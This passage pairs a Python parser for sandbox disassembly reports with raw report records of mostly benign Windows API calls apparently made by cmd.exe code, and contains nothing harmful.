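                      int(parts[3], 16), prot, PAGE_PROTECTION.get(prot, "unknown"))


def parse_records(text: str) -> list:
    """One FunctionRecord per 'Uniqueness Score:' block; a cut-off trailing block is kept."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line.startswith("Uniqueness Score:"):
            records.append(cur)
            cur = FunctionRecord()
            continue
        caller = None
        if m := SUBCALL.match(line):
            caller, line = int(m["caller"], 16), m["rest"]
        if m := API_REF.match(line):
            cur.apis.append(ApiRef(m["name"], m["module"], int(m["addr"], 16), caller))
        elif m := SDMP.match(line):
            cur.dump, cur.image_base = m["dump"], int(m["offset"], 16)
        elif m := KV.match(line):
            cur.fields[m.group(1)] = m.group(2).strip()
    if cur.apis or cur.fields:
        records.append(cur)
    return records


def id_parts(rec: FunctionRecord, key: str = "String ID") -> list:
    """Split an ID field on '$' (assumed to separate the individual items)."""
    return [p for p in rec.fields.get(key, "").split("$") if p]


def records_calling(records: list, names: set) -> list:
    return [r for r in records if any(a.name in names for a in r.apis)]


# Constructed sample: two records from this page, trimmed to the parsed lines.
SAMPLE = r"""
APIs
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE9A10
• RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BE9994
  • Part of subcall function 00007FF789BEA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA77A
  • Part of subcall function 00007FF789BEA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA850
• wcsrchr.MSVCRT ref: 00007FF789BE9A62
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Similarity
• API ID: ErrorLast$CloseEnumOpenwcsrchr
• String ID: %s=%s$.
Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BE54E6
• CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BE552E
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Similarity
• API ID: ErrorLast$CreateCurrentMutexProcess
• String ID: Local\SM0:%d:%d:%hs$wil$x
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in records_calling(recs, REGISTRY_APIS | {"CreateMutexExW"}):
        d = parse_dump_name(r.dump)
        print(hex(d.base), d.protection_name, [a.name for a in r.apis], id_parts(r))
```

Feed it the whole disassembly section of a report and filter with `records_calling` on the API families you care about; `parse_dump_name` tells you whether a record came from the executable image region (PAGE_EXECUTE_READ here) or from a data dump, which matters when the same process also holds injected code.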

APIs
• memset.MSVCRT ref: 00007FF789BC921C
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BC93AA
  • Part of subcall function 00007FF789BC8B20: wcsrchr.MSVCRT ref: 00007FF789BC8BAB
  • Part of subcall function 00007FF789BC8B20: _wcsicmp.MSVCRT ref: 00007FF789BC8BD4
  • Part of subcall function 00007FF789BC8B20: _wcsicmp.MSVCRT ref: 00007FF789BC8BF2
  • Part of subcall function 00007FF789BC8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BC8C16
  • Part of subcall function 00007FF789BC8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BC8C2F
  • Part of subcall function 00007FF789BC8B20: wcschr.MSVCRT ref: 00007FF789BC8CB3
  • Part of subcall function 00007FF789BD417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD41AD
  • Part of subcall function 00007FF789BD3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF789BC92AC), ref: 00007FF789BD30CA
  • Part of subcall function 00007FF789BD3060: SetErrorMode.KERNELBASE ref: 00007FF789BD30DD
  • Part of subcall function 00007FF789BD3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD30F6
  • Part of subcall function 00007FF789BD3060: SetErrorMode.KERNELBASE ref: 00007FF789BD3106
• wcsrchr.MSVCRT ref: 00007FF789BC92D8
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BC9362
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BC9373
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
• String ID:
• API String ID: 3966000956-0
• Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
• Instruction ID: e7a3b346f87b09f5962bbdac50a748e23d4be2599c119c09d5d30611594dd059
• Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
• Instruction Fuzzy Hash: 4A51A632A0968AC5EB61AF11D8542B9BBB0FB89F5AFA44035DA0D07795DF3CE551C310
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$_setjmp
• String ID:
• API String ID: 3883041866-0
• Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
• Instruction ID: a485904a49f6f34e065a4957c3663e57087ae8433d1bcef19e9ba5c4edc52401
• Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
• Instruction Fuzzy Hash: EF513E32608BCA8AEB61DF21D8503E9B7B4FB49B49FA04135EA4D87A48DF3DD645C710
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 00007FF789BCB4BD
  • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
  • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
  • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
  • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
• _wcsicmp.MSVCRT ref: 00007FF789BCB518
• _wcsicmp.MSVCRT ref: 00007FF789BCB58B
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$_wcsicmp$AllocProcess
• String ID: ELSE$IF/?
• API String ID: 3223794493-1134991328
• Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
• Instruction ID: 2dc4879d940366f50a2f27c4476a4e7ddf17d73efb25c53c79108324486e0d23
• Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
• Instruction Fuzzy Hash: 79413921E0D65AC2FA54BF65E4152BDAAB1BF84F5AFF45035D50E46292DE3DE900C320
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$File_get_osfhandle$PointerReadlongjmp
• String ID:
• API String ID: 1532185241-0
• Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
• Instruction ID: 2ccb241acd87a2a7ca950f95f99590279620b8aeac42c859ae0c8f534dee009a
• Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
• Instruction Fuzzy Hash: 5D41D132A047968BE714AF21D44557DBEB5FB88F82FA54539EA0A47784CF3CE841C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: ErrorFileLast$DeleteRead_get_osfhandle
• String ID:
• API String ID: 3588551418-0
• Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
• Instruction ID: 4341d608989cfbbbcc4304e8e160257c044c26b8af96f35e59eae68e359eda2b
• Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
• Instruction Fuzzy Hash: 3D419035A0868A8BE764AF51D44027DFA71FF85F92FA44039DA0E47791CE6CE840C760
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: ErrorModememset$FullNamePath_wcsicmp
• String ID:
• API String ID: 2123716050-0
• Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
• Instruction ID: 9e1512480ec80439d8974e80984495766affe12fb01a835d6852ef3a1f1ff82a
• Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
• Instruction Fuzzy Hash: B141C332705BC68AEB31EF21D8543E9ABA4FB49B8DF544034DA4D4AA99DF3CD244C310
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
• String ID:
• API String ID: 3114114779-0
• Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
• Instruction ID: 8121301643bbce0c4bd63a7c000571337ba898b44b73f03a4b7f0b1b27b389e5
• Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
• Instruction Fuzzy Hash: CF413B36A05B46CAE700DF65D4442AC7BB5FB48B59FA44035EE0D93B54DF38E415C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA77A
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA7AF
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA80E
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA839
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA850
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: QueryValue$CloseErrorLastOpen
• String ID:
• API String ID: 2240656346-0
• Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
• Instruction ID: f3c7435473db35800dde22b9f0d028a5d3f4a41a5b2ea3ae89dcf86f3d1160cf
• Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
• Instruction Fuzzy Hash: 4B319232A18A4582E750AF15E44447DFBB9FB88B92FE54034EA4E42754EF3CD845CB10
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF789BD01B8: _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
  • Part of subcall function 00007FF789BD01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BED0F9
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF789BED10F
• ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF789BED166
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BED17A
• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF789BED18C
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
• String ID:
• API String ID: 3008996577-0
• Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
• Instruction ID: 864d9ae6a2f2c86898961b2cc931efe8649407b48d0752b57817155381a8b44d
• Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
• Instruction Fuzzy Hash: B2212726B14A558AE700AF71E8501BDBBB0FB8DF46BA45125EE0D53B98EF38D045CB24
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: CreateSemaphore
• String ID: _p0$wil
• API String ID: 1078844751-1814513734
• Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
• Instruction ID: 68d2b866a281ff35c7f8a571e8907582f8f3578550bfc3a55acd6c9468307f52
• Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
• Instruction Fuzzy Hash: CC51D6A1B1974A86EE21AF1484546BDEAB8FF84F92FF44435DA0D07B81EE7CE405C320
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF789BEB934
• GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF789BD5085), ref: 00007FF789BEB9A5
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF789BD5085), ref: 00007FF789BEB9F7
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Global$AllocAsciizCreateFreeFromStringUnicode
• String ID: %WINDOWS_COPYRIGHT%
• API String ID: 1103618819-1745581171
• Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
• Instruction ID: 6a6e114450d5b99e45c6656b274a3e910cd2587d29c262f8ecc4be89d53ad20e
• Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
• Instruction Fuzzy Hash: B441946690879982EB10AF15941427DBBB4FB89F92FE55235DE8D03395EF3CE441C710
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$_wcslwr
• String ID: [%s]
• API String ID: 886762496-302437576
• Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
• Instruction ID: 6d9f26cc0568b4bf4b3370616055d1c6af86503e478ce8ade8b2148d9b945875
• Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
• Instruction Fuzzy Hash: AA317C32705B8A85EB21EF21D8543E9ABA0FB89B89F944035DE4D47755EF3CD645C310
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: iswspace
• String ID: off
• API String ID: 2389812497-733764931
• Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
• Instruction ID: 4c2d049b8317230979636cd0f06f7706517555cda64f6fa5b67687d150c12973
• Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
• Instruction Fuzzy Hash: 88216221E0C64B81FAA07F15A558279EEB0FF45FA6FE88034D90E47682EE2CE540C321
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: %s=%s$DPATH$PATH
• API String ID: 3731854180-3148396303
• Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
• Instruction ID: 0f46443378b8ac95238ad70f785bace2c89b26dcd92c0fd83b4df8ec5e125d4b
• Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
• Instruction Fuzzy Hash: F6218825B0964A80EA65BF95E444279EEB5BF80F82FE84135DD0E43395EE2CE448C360
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcscmp
• String ID: *.*$????????.???
• API String ID: 3392835482-3870530610
• Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
• Instruction ID: 7ae7599313b2326dc7436233e8246460c9523255f46b0b843f8662c5cec9cb1c
• Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
• Instruction Fuzzy Hash: 5111E525B14A5A81E764AF26B444139FBB1FB48FC2FA85030CE8D57B85DE3DE441C710
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: fprintf
• String ID: CMD Internal Error %s$%s$Null environment
• API String ID: 383729395-2781220306
• Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
• Instruction ID: dcb82ae52543d1199e1ab21eddd198ddc618c7d152358488ca0adf894f17a504
• Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
• Instruction Fuzzy Hash: 3011C12290864AA1EB55AF54E9041BDAA75FB44FF2FE05331DA3D432D4EF2CE489C351
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: iswspacewcschr
